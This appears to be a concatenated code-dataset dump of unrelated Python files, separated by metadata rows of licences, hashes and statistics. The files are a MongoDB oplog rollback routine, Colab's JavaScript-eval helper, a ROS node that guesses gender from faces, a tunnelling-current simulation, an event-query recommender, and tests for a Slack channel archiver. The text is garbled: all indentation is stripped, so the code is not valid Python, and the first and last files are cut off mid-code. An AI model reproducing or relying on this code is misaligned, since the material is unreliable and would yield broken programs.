logging.debug("OplogThread: Initializing the oplog cursor.")
timestamp = self.read_last_checkpoint()
if timestamp is None and self.collection_dump:
timestamp = self.dump_collection()
if timestamp:
msg = "Dumped collection into target system"
logging.info('OplogThread: %s %s'
% (self.oplog, msg))
elif timestamp is None:
# set timestamp to top of oplog
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
self.checkpoint = timestamp
cursor = self.get_oplog_cursor(timestamp)
if cursor is not None:
self.update_checkpoint()
return cursor
def update_checkpoint(self):
"""Store the current checkpoint in the oplog progress dictionary.
"""
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
oplog_dict[str(self.oplog)] = self.checkpoint
logging.debug("OplogThread: oplog checkpoint updated to %s" %
str(self.checkpoint))
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
if oplog_str in oplog_dict.keys():
ret_val = oplog_dict[oplog_str]
logging.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
logging.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}},
sort=[('$natural', pymongo.DESCENDING)]
)
logging.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = namespace
for source_name, dest_name in self.dest_mapping.items():
if dest_name == namespace:
original_namespace = source_name
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
to_update = util.retry_until_ok(
self.main_connection[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
fields=self._fields
)
#doc list are docs in target system, to_update are
#docs in mongo
doc_hash = {} # hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
#delete the inconsistent documents
logging.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for doc in doc_hash.values():
try:
dm.remove(doc)
remov_inc += 1
logging.debug("OplogThread: Rollback, removed %s " %
str(doc))
except errors.OperationFailed:
logging.warning(
"Could not delete document during rollback: %s "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % str(doc)
)
logging.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
#insert the ones from mongo
logging.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
doc['_ts'] = util.bson_ts_to_long(rollback_cutoff_ts)
doc['ns'] = self.dest_mapping.get(namespace, namespace)
try:
insert_inc += 1
dm.upsert(doc)
except errors.OperationFailed as e:
fail_insert_inc += 1
logging.error("OplogThread: Rollback, Unable to "
"insert %s with exception %s"
% (doc, str(e)))
logging.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
| apache-2.0 | 1,205,969,537,052,731,600 | 39.97047 | 80 | 0.496445 | false | 4.877437 | false | false | false |
googlecolab/colabtools | google/colab/output/_js.py | 1 | 3073 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Colab helpers for interacting with JavaScript in outputframes."""
import json
from google.colab import _ipython
from google.colab import _message
_json_decoder = json.JSONDecoder()
def eval_js(script, ignore_result=False, timeout_sec=None):
"""Evaluates the Javascript within the context of the current cell.
Args:
script: The javascript string to be evaluated
ignore_result: If true, will return immediately
and result from javascript side will be ignored.
timeout_sec: blocks for that many seconds.
Returns:
Result of the Javascript evaluation or None if ignore_result.
"""
args = ['cell_javascript_eval', {'script': script}]
kernel = _ipython.get_kernel()
request_id = _message.send_request(*args, parent=kernel.shell.parent_header)
if ignore_result:
return
return _message.read_reply_from_input(request_id, timeout_sec)
_functions = {}
def register_callback(function_name, callback):
"""Registers a function as a target invokable by Javacript in outputs.
This exposes the Python function as a target which may be invoked by
Javascript executing in Colab output frames.
This callback can be called from javascript side using:
colab.kernel.invokeFunction(function_name, [1, 2, 3], {'hi':'bye'})
then it will invoke callback(1, 2, 3, hi="bye")
Args:
function_name: string
callback: function that possibly takes positional and keyword arguments
that will be passed via invokeFunction()
"""
_functions[function_name] = callback
def _invoke_function(function_name, json_args, json_kwargs):
"""Invokes callback with given function_name.
This function is meant to be used by frontend when proxying
data from secure iframe into kernel. For example:
_invoke_function(fn_name, "'''" + JSON.stringify(data) + "'''")
Note the triple quotes: valid JSON cannot contain triple quotes,
so this is a valid literal.
Args:
function_name: string
json_args: string containing valid json, provided by user.
json_kwargs: string containing valid json, provided by user.
Returns:
The value returned by the callback.
Raises:
ValueError: if the registered function cannot be found.
"""
args = _json_decoder.decode(json_args)
kwargs = _json_decoder.decode(json_kwargs)
callback = _functions.get(function_name, None)
if not callback:
raise ValueError('Function not found: {function_name}'.format(
function_name=function_name))
return callback(*args, **kwargs)
| apache-2.0 | 8,002,486,483,341,580,000 | 31.691489 | 78 | 0.731207 | false | 4.006519 | false | false | false |
amasiero/approach_control | approach_control_people/nodes/approach_control_people/faces/GenderDiscover.py | 1 | 2283 | #!/usr/bin/env python
import cv2.cv
import imutils
import time
import smach
import smach_ros
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from approach_control_people.faces.Map import Map
from approach_control_people.faces.ULBP import ULBP
from approach_control_people.faces.lbp_utils import W, Authentify
from approach_control_people.faces.load_database import load_female_db as female_db
from approach_control_people.faces.load_database import load_male_db as male_db
class GenderDiscover(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['woman', 'man', 'fail'])
self.face_cascade = cv2.CascadeClassifier('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
self.bridge = CvBridge()
self.GRID = 16
self.SIZE = 128
self.m = Map('Regions')
self.m.MakeRegularCluster(self.SIZE, self.SIZE, self.GRID, self.GRID)
self.m.MakeRegions()
self.ulbp_face = ULBP(self.m)
self.ulbp_female = ULBP(self.m)
self.ulbp_male = ULBP(self.m)
self.ulbp_male.MakePattern(male_db())
self.ulbp_male.MakeHistogram()
self.ulbp_female.MakePattern(female_db())
self.ulbp_female.MakeHistogram()
self.gender = None
def is_woman(self, img):
self.ulbp_face.MakePattern(img)
self.ulbp_face.MakeHistogram()
return Authentify(self.ulbp_face.histogram, self.ulbp_female.histogram, self.ulbp_male.histogram, W) > 20.0
def callback(self, data):
try:
image = self.bridge.imgmsg_to_cv2(data, 'bgr8')
except CvBridgeError as e:
rospy.logerr(e)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
roi_gray = None
faces = self.face_cascade.detectMultiScale(
gray,
scaleFactor = 1.1,
minNeighbors = 10,
minSize = (100,100),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
for (x, y, w, h) in faces:
x1 = x + int(w * .1)
x2 = x1 + int(w * .8)
y1 = y + int(h * .2)
y2 = y1 + int(h * .8)
roi_gray = cv2.resize(gray[y1:y2, x1:x2], (128, 128))
self.gender = 'man'
if self.is_woman(roi_gray):
self.gender = 'woman'
def execute(self, userdata):
rospy.Subscriber('/image_raw', Image, self.callback)
rospy.sleep(5)
if self.gender is not None:
return self.gender
else:
return 'fail' | gpl-2.0 | -3,593,615,707,399,300,000 | 24.098901 | 119 | 0.700394 | false | 2.624138 | false | false | false |
jithinbp/BTK_simulations | current_fermi.py | 1 | 2141 | import math
import pygrace
import pygame,os,time,sys
WIDTH=400
HEIGHT=100
size = [WIDTH,HEIGHT]
flags=pygame.SRCALPHA|pygame.HWSURFACE|pygame.HWACCEL
os.environ['SDL_VIDEO_WINDOW_POS'] = '700,100'
screen = pygame.display.set_mode(size,flags)
pygame.display.set_caption("Transmission and reflection")
def xmgrace():
global pg
try:
import pygrace
except:
print 'damn'
return
pg = pygrace.grace()
pg.xlabel('V -->>')
pg.ylabel('I -->')
pg.title('Current')
#globals
ev=1.6e-19
k=1#8.617e-5
delta=2*0.001
T=5.0/11605.0 #temperature in eV 1ev=11605k
z=1.0 #Barrier strength at the interface
#general form
def gamma2(u2):
return (u2+z*z*(2*u2-1) )**2
def u2(E):
return 0.5*(1+math.sqrt((E**2-delta**2)/(E**2)) )
def PA(E): #probability of andreev reflection
if E<delta:
t2=E*E + (delta*delta-E*E)*( (1+2*z*z)**2 )
return (delta*delta)/t2
else:
u=u2(E)
return u*(1-u)/gamma2(u)
def PB(E): #probability of ordinary reflection
if E<delta:
return 1-PA(E)
else:
u=u2(E)
return (2*u-1)*(2*u-1)*(1+z*z)*z*z/gamma2(u)
def fermi_fn(E):
#print 'E,k*T, E/(k*T) = ',E,k*T,E/(k*T)
x= 1.0/(math.exp(E/(T))+1)
return x
def integ(E,V):
x=(fermi_fn(E-V)-fermi_fn(E))*(1+PA(E)-PB(E))
return x
def current(V):
#integrate between reasonable limits ( not -inf to +inf )
I=0
dE=1.0e-3
E=0
while E<0.3:
Im=integ(E,V)*(dE)
Ip=integ(-E,V)*(dE)
I+=Im+Ip
E+=dE
#print 'E,I= ',E,I
return I
xmgrace()
pg.hold(1)
dump=open('TandR_Z0.txt','wt')
#XMGRACE PLOT FEATURES
# A=Black , B=red , C in green , D in Blue
def refresh(z):
pg.xlabel('E (Z = %2.2f) -->'%(z))
pg.clear()
pg.hold(1)
dump=open('I.txt','wt')
y=[]
x=[]
V=0
dV=1e-5
while V<3e-3:
j=V
g=current(V)
V+=dV
if(j):
#print j,g
x.append(j)
y.append(g)
dump.write('%f %f\n'%(j,g) )
pg.plot(x,y)
dump.write('\n')
dump.close()
ll=0
refresh(z)
run=True
while run:
event=pygame.event.wait()
if event.type == pygame.QUIT:
try:
pg.exit()
run=False
except:
sys.exit()
ll=0
try:
ll=event.button
if(ll==4):z+=0.1
elif (ll==5): z-=0.1
if z<0: z=0
except:
continue
if(ll):refresh(z)
| gpl-3.0 | 8,471,243,037,193,875,000 | 14.977612 | 58 | 0.609061 | false | 2.021719 | false | false | false |
anguoyang/SMQTK | OLD_ROOT/WebUI/QueryRecommend/query_recommend.py | 1 | 7183 | """
LICENCE
-------
Copyright 2013 by Kitware, Inc. All Rights Reserved. Please refer to
KITWARE_LICENSE.TXT for licensing information, or contact General Counsel,
Kitware, Inc., 28 Corporate Drive, Clifton Park, NY 12065.
"""
import os
import numpy as np
import json
thispath = os.path.dirname(os.path.abspath(__file__))
# commonly used words in event descriptions
additional_stop_words = ['event', 'name', 'explication', 'evidential', 'description', 'scene',
'objects', 'people', 'activities', 'audio']
# zero-shot queries for E006 ~ E015
queries = dict()
queries['E000'] = ''
queries['E006'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting sc.has_audience sc.congregating' \
' ob.light_source ob.person'
queries['E007'] = 'sc.transporting sc.manmade sc.using_tools sc.asphalt ob.round_shape ob.car'
queries['E008'] = 'sc.congregating sc.has_audience ob.person sc.pavement' \
' ob.large_group_of_people ob.crowd ob.small_group_of_people ob.railing ob.floor'
queries['E009'] = 'sc.dirty sc.natural_light sc.natural ob.large_open_area sc.sunny sc.trees' \
' ob.truck ob.car ob.large_open_area ob.outdoor'
queries['E010'] = 'sc.working sc.dirty sc.enclosed_area'
queries['E011'] = 'sc.enclosed_area sc.wood_not_part_of_tree sc.electric_or_indoor_lighting'
queries['E012'] = 'sc.congregating sc.has_audience sc.asphalt sc.pavement' \
' ob.person ob.large_group_of_people ob.tree ob.sports_venue ob.crowd' \
' ob.small_group_of_people ob.railing ob.floor'
queries['E013'] = 'sc.asphalt sc.trees sc.natural_light sc.open_area' \
' ob.large_open_area ob.tree ob.rectangular_shape ob.door'
queries['E014'] = 'sc.using_tools sc.working sc.learning ob.round_shape'
queries['E015'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting'
queries['E021'] = 'sc.trees sc.vegetation sc.natural sc.open_area sc.pavement sc.asphalt sc.natural_light' \
' ob.tree ob.large_open_area ob.cloud ob.outdoor ob.sports_venue ob.sky ob.truck '
queries['E022'] = 'sc.learning sc.working sc.enclosed_area sc.dirty sc.using_tools sc.electric_or_indoor_lighting'
queries['E023'] = 'sc.asphalt sc.pavement sc.clouds' \
' ob.cloud ob.small_group_of_people ob.floor ob.sports_venue ob.railing'
queries['E024'] = 'sc.transporting sc.asphalt sc.trees sc.pavement ob.rectangular_shape ob.door'
queries['E025'] = 'sc.person ob.small_group_of_people ob.vertical_pattern'
queries['E026'] = 'sc.wood_not_part_of_tree sc.enclosed_area sc.working sc.using_tools sc.dirty' \
' ob.door ob.vertical_pattern ob.rectangular_shape ob.railing '
queries['E027'] = 'sc.natural sc.dirty sc.open_area sc.trees sc.natural_light' \
' ob.large_group_of_people ob.tree ob.outdoor ob.vertical_pattern ob.crowd ob.person '
queries['E028'] = 'sc.person sc.has_audience sc.enclosed_area ob.rectangular_shape ob.crowd'
queries['E029'] = 'sc.sunny sc.still_water sc.open_area sc.pavement sc.trees sc.manmade sc.asphalt' \
' ob.large_open_area ob.sports_venue ob.outdoor ob.horizontal_pattern'
queries['E030'] = 'sc.using_tools sc.working sc.dirty ob.railing ob.floor ob.face'
def read_words(_words):
words = []
with open(_words, 'r') as fid_stop_words:
for line in fid_stop_words:
if line[-1]=='\n':
line = line[:-1]
if line != '':
words.append(line)
return words
def preprocess(string, stop_words=None, special_char=None):
if stop_words is None:
_stop = thispath + '/stop_words.txt'
stop_words = read_words(_stop)
if special_char is None:
_special = thispath + '/special_characters.txt'
special_char = read_words(_special)
string = string.lower()
string = string.replace('\n', ' ')
string = string.replace('\t', ' ')
for schar in special_char:
string = string.replace(schar.decode("utf8"), '')
words = string.split(' ')
words_out = []
for w in words:
if not (w in stop_words) and len(w) > 0:
words_out.append(w)
return words_out
def generate_bow(string, dictionary):
bow = np.zeros(len(dictionary))
words = preprocess(string)
for w in words:
try:
bow[dictionary[w]] += 1
except KeyError:
# A word doesn't exist in the dictionary, so ignore it.
continue
if np.sum(bow) > 0:
bow /= np.sum(bow)
return bow
def build_dictionary():
_stop = thispath + '/stop_words.txt'
_special = thispath + '/special_characters.txt'
stop_words = read_words(_stop) + additional_stop_words
special_char = read_words(_special)
words = []
for eid in range(6, 16) + range(21, 31):
string = ""
with open('./eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
words += preprocess(string, stop_words, special_char)
words = sorted(list(set(words)))
dictionary = dict()
for idx, w in enumerate(words):
dictionary[w] = idx
np.save('dictionary_event_description.npy', dictionary)
def generate_event_bow():
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
for eid in range(6, 16) + range(21, 31):
string = ""
with open(thispath + '/eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
bow_eid = generate_bow(string, dictionary)
np.save(thispath + '/eventbow/E%03d.npy' % eid, bow_eid)
def recommend_query(string):
'''
Return zero-shot queries based on event description
@param string: Event description in a string format
@return: Queries in a string format
'''
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
bow = generate_bow(string, dictionary)
min_dist = 1
detected_eid = 0 # if description matching fails, it will return an empty query.
for eid in range(6, 16) + range(21, 31):
bow_eid = np.load(thispath + '/eventbow/E%03d.npy' % eid)
dist = np.sqrt(np.sum((bow - bow_eid)**2))
if min_dist > dist:
min_dist = dist
detected_eid = eid
return queries['E%03d' % detected_eid]
if __name__ == '__main__':
# build_dictionary()
# generate_event_bow()
string = 'AExplication: Bikes are normally ridden with a person sitting down on ' \
'seat and holding onto the handlebars and steering with their hands. ' \
'Tricks consist of difficult ways of riding the bike, such as on ' \
'one wheel, steering with feet or standing on the seat; or intentional ' \
'motions made with the bike that are not simply slowing down/stopping ' \
'the bike, propelling it forward, or steering the bike as it'
q = recommend_query(string)
print q
| bsd-3-clause | 2,104,360,600,271,689,500 | 42.067485 | 114 | 0.622442 | false | 3.278412 | false | false | false |
rossrader/destalinator | tests/test_destalinator.py | 1 | 25539 | from datetime import date, datetime, timedelta
import mock
import os
import unittest
import destalinator
import slacker
import slackbot
sample_slack_messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Human human human.",
"ts": "1355517523.000005",
"edited": {
"user": "U2147483697",
"ts": "1355517536.000001"
}
},
{
"type": "message",
"subtype": "bot_message",
"text": "Robot robot robot.",
"ts": "1403051575.000407",
"user": "U023BEAD1"
},
{
"type": "message",
"subtype": "channel_name",
"text": "#stalin has been renamed <C2147483705|khrushchev>",
"ts": "1403051575.000407",
"user": "U023BECGF"
},
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Contemplating existence.",
"ts": "1355517523.000005"
},
{
"type": "message",
"subtype": "bot_message",
"attachments": [
{
"fallback": "Required plain-text summary of the attachment.",
"color": "#36a64f",
"pretext": "Optional text that appears above the attachment block",
"author_name": "Bobby Tables",
"author_link": "http://flickr.com/bobby/",
"author_icon": "http://flickr.com/icons/bobby.jpg",
"title": "Slack API Documentation",
"title_link": "https://api.slack.com/",
"text": "Optional text that appears within the attachment",
"fields": [
{
"title": "Priority",
"value": "High",
"short": False
}
],
"image_url": "http://my-website.com/path/to/image.jpg",
"thumb_url": "http://example.com/path/to/thumb.png",
"footer": "Slack API",
"footer_icon": "https://platform.slack-edge.com/img/default_application_icon.png",
"ts": 123456789
}
],
"ts": "1403051575.000407",
"user": "U023BEAD1"
}
]
sample_warning_messages = [
{
"user": "U023BCDA1",
"text":"This is a channel warning! Put on your helmets!",
"username":"bot",
"bot_id":"B0T8EDVLY",
"attachments": [{"fallback":"channel_warning", "id": 1}],
"type":"message",
"subtype":"bot_message",
"ts":"1496855882.185855"
}
]
class MockValidator(object):
def __init__(self, validator):
# validator is a function that takes a single argument and returns a bool.
self.validator = validator
def __eq__(self, other):
return bool(self.validator(other))
class SlackerMock(slacker.Slacker):
def get_users(self):
pass
def get_channels(self):
pass
class DestalinatorChannelMarkupTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_multiple(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general multiple #general channel #general references."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> multiple <#ABC123|general> channel <#ABC123|general> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_hyphens(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #channel-with-hyphens references."
mock_slacker.add_channel_markup.return_value = "<#EXA456|channel-with-hyphens>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#EXA456|channel-with-hyphens> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_ignore_screaming(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference and ignore my #HASHTAGSCREAMING thanks."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference and ignore my #HASHTAGSCREAMING thanks."
)
class DestalinatorChannelMinimumAgeTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_old(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 60}
self.assertTrue(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_exactly_expected_age(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 30}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_young(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 1}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
target_archive_date = date.today() + timedelta(days=10)
target_archive_date_string = target_archive_date.isoformat()
class DestalinatorGetEarliestArchiveDateTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch.dict(os.environ, {'EARLIEST_ARCHIVE_DATE': target_archive_date_string})
def test_env_var_name_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = 'EARLIEST_ARCHIVE_DATE'
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_archive_date_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = target_archive_date_string
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_falls_back_to_past_date(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = None
self.assertEqual(
self.destalinator.get_earliest_archive_date(),
datetime.strptime(destalinator.PAST_DATE_STRING, "%Y-%m-%d").date()
)
class DestalinatorGetMessagesTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_default_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(len(self.destalinator.get_messages("general", 30)), len(sample_slack_messages))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_empty_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = []
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum('subtype' not in m for m in sample_slack_messages)
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_limited_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = ['bot_message']
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum(m.get('subtype', None) in (None, 'bot_message') for m in sample_slack_messages)
)
class DestalinatorGetStaleChannelsTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_default_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 0)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_specific_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 2)
class DestalinatorIgnoreChannelTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
def test_with_explicit_ignore_channel(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_matching_ignore_channel_pattern(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^stal']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_non_mathing_ignore_channel_pattern(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len']
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
def test_with_many_matching_ignore_channel_patterns(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len', 'lin', '^st']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_empty_ignore_channel_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = []
self.destalinator.config.config['ignore_channel_patterns'] = []
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
class DestalinatorStaleTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_sample_messages(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertFalse(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_users_ignored(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_a_dolphin_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": ":dolphin:",
"ts": "1355517523.000005"
}
]
self.destalinator.get_messages = mock.MagicMock(return_value=messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_an_attachment_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
